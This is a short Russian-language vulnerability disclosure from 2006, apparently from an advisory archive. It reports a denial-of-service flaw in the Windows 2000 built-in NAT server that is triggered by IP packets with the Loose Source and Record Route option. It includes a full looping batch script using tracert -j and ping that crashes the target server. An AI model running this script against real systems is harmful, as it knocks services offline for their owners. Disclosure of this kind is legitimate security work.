DOS во встроенном NAT сервере Windows 2000

2006-02-09T00:00:00
ID SECURITYVULNS:DOC:11353
Type securityvulns
Reporter Securityvulns
Modified 2006-02-09T00:00:00

Description

Обнаружил dos во встроенном NAT сервере Windows 2000

Конфигурация проверенных серверов: Windows 2000 English Standard/Advanced Service Pack 4 + Update Rollup 1 for Service Pack 4 с установленным NAT сервером. При прохождении ip пакетов через сервер, с включенной опцией "Loose Source and Record Route" определенной в RFC 791, ОС выпадает в синий экран с ошибкой в tcpip.sys или ntoskrnl.exe, замирает картинка или сервер начинает работать нестабильно(в программах вылетают эксепшены). Без разницы откуда идут пакеты, из внешней или внутренней сети.

Проверить можно следующим образом, запустить командный сценарий с адресом сервера подпадающим под условия определенные выше:

Set targetip=192.168.146.128 :1 tracert -h 1 -j 0.0.0.0 %targetip% tracert -h 1 -j 0.0.0.0 %targetip% tracert -h 1 -j 0.0.0.0 %targetip% tracert -h 1 -j 0.0.0.0 %targetip% tracert -h 1 -j 0.0.0.0 %targetip% ping %targetip% -n 1 || goto end goto 1 :end @cls @Echo Server is crash @pause exit

Проверял также и на Windows 2003, ошибка не повторилась. Ошибка вроде вылетала и на Windows 2000 + ISA 2000 но надо проверять. Во всяком случае у знакомого при отработке этого скрипта с минуту, в конфе Windows 2000 + ISA 2000, при открытии оснасток стали вылетать эксепшены. Можно проверить, но это будет в выходные. ISA 2004 ничего не было, стабильно работал дальше.